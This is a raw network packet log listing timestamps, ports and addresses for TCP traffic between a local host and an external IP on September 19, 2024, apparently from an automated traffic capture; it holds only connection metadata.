Sep 19, 2024 02:25:47.576436043 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.576462984 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.577167988 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.577199936 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.577225924 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.577231884 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.577264071 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.577287912 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.577864885 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.577898026 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.577920914 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.617249012 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.617294073 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.617316008 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.657551050 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.657618999 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.657622099 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.658961058 CEST	39001	49754	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.659032106 CEST	49754	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.659161091 CEST	49754	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.661170006 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.661200047 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.661247969 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.661250114 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.661281109 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.661299944 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.661328077 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.661360025 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.661389112 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.661391020 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.661425114 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.661438942 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.661457062 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.661495924 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.661504030 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.661524057 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.661556005 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.661575079 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.661583900 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.661633968 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.661647081 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.661665916 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.661715984 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.661726952 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.661773920 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.661820889 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.661828041 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.661853075 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.661884069 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.661901951 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.661925077 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.661974907 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.662085056 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.662134886 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.662164927 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.662188053 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.662237883 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.662298918 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.662302017 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.662329912 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.662378073 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.662378073 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.662425995 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.662457943 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.662482977 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.662488937 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.662520885 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.662544012 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.662552118 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.662585020 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.662609100 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.662921906 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.662970066 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.662981033 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.663002014 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.663033009 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.663058043 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.663080931 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.663114071 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.663131952 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.663146019 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.663177967 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.663192987 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.663208961 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.663240910 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.663256884 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.663274050 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.663305044 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.663325071 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.663337946 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.663423061 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.663738012 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.663883924 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.663930893 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.663949966 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.663963079 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.663995028 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.664020061 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.664042950 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.664073944 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.664096117 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.664107084 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.664138079 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.664158106 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.664170027 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.664201021 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.664220095 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.664233923 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.664266109 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.664290905 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.664297104 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.664329052 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.664347887 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.664361000 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.664388895 CEST	39001	49754	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.664412975 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.664614916 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.664645910 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.664680004 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.664700985 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.664727926 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.664774895 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.664783001 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.664807081 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.664838076 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.664854050 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.664870024 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.664901018 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.664916992 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.664932013 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.664963007 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.664977074 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.664997101 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.665028095 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.665054083 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.665059090 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.665091991 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.665107012 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.665124893 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.665174007 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.665508986 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.746037960 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.746155977 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.746196032 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.746229887 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.746263981 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.746295929 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.746299982 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.746329069 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.746361017 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.746364117 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.746395111 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.746428967 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.746583939 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.747945070 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.747978926 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.748009920 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.748045921 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.751632929 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.751667023 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.751698017 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.751785994 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.751792908 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.751792908 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.751820087 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.751868963 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.751925945 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.751961946 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.751966000 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.751985073 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.752018929 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.752067089 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.752100945 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.752131939 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.752135992 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.752159119 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.752163887 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.752196074 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.752228022 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.752259970 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.752262115 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.752293110 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.752300978 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.752325058 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.752360106 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.752388954 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.752439022 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.752470970 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.752473116 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.752549887 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.752585888 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.752599001 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.752633095 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.752681971 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.752716064 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.752732038 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.752779961 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.752815008 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.752827883 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.752861023 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.752892017 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.752892971 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.752923965 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.752954960 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.752958059 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.752986908 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.753019094 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.753021955 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.753051043 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.753082991 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.753086090 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.753133059 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.753164053 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.753170013 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.753212929 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.753221989 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.753245115 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.753293991 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.753329039 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.753344059 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.753375053 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.753377914 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.753406048 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.753437996 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.753441095 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.753485918 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.753515959 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.753518105 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.753549099 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.753571987 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.753581047 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.753628969 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.753660917 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.753691912 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.753696918 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.753726959 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.753726959 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.753774881 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.753807068 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.753808975 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.753838062 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.753873110 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.753905058 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.753906965 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.753937006 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.753941059 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.753971100 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.754002094 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.754007101 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.754033089 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.754064083 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.754066944 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.754096985 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.754132986 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.754134893 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.754179955 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.754213095 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.754244089 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.754275084 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.754278898 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.754309893 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.754343033 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.754358053 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.754389048 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.754420996 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.754426956 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.754452944 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.754483938 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.754513979 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.754518032 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.754548073 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.754548073 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.754580975 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.754612923 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.754616022 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.754645109 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.754676104 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.754678965 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.754707098 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.754739046 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.754740953 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.754766941 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.754797935 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.754800081 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.754829884 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.754861116 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.754862070 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.754894018 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.754926920 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.754960060 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.754960060 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.754991055 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.754997015 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.755023003 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.755054951 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.755085945 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.755089998 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.755120039 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.755125999 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.755151987 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.755183935 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.755214930 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.755217075 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.755247116 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.755250931 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.755279064 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.755311012 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.755312920 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.755343914 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.755378008 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.755378962 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.758361101 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.774111032 CEST	49755	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.779162884 CEST	39001	49755	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.779382944 CEST	49755	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.807930946 CEST	49755	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.813380957 CEST	39001	49755	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.813534975 CEST	49755	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:47.818411112 CEST	39001	49755	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.836540937 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.836600065 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.836649895 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.836683035 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.836715937 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.836747885 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:47.836760998 CEST	49712	56001	192.168.2.6	45.11.229.96
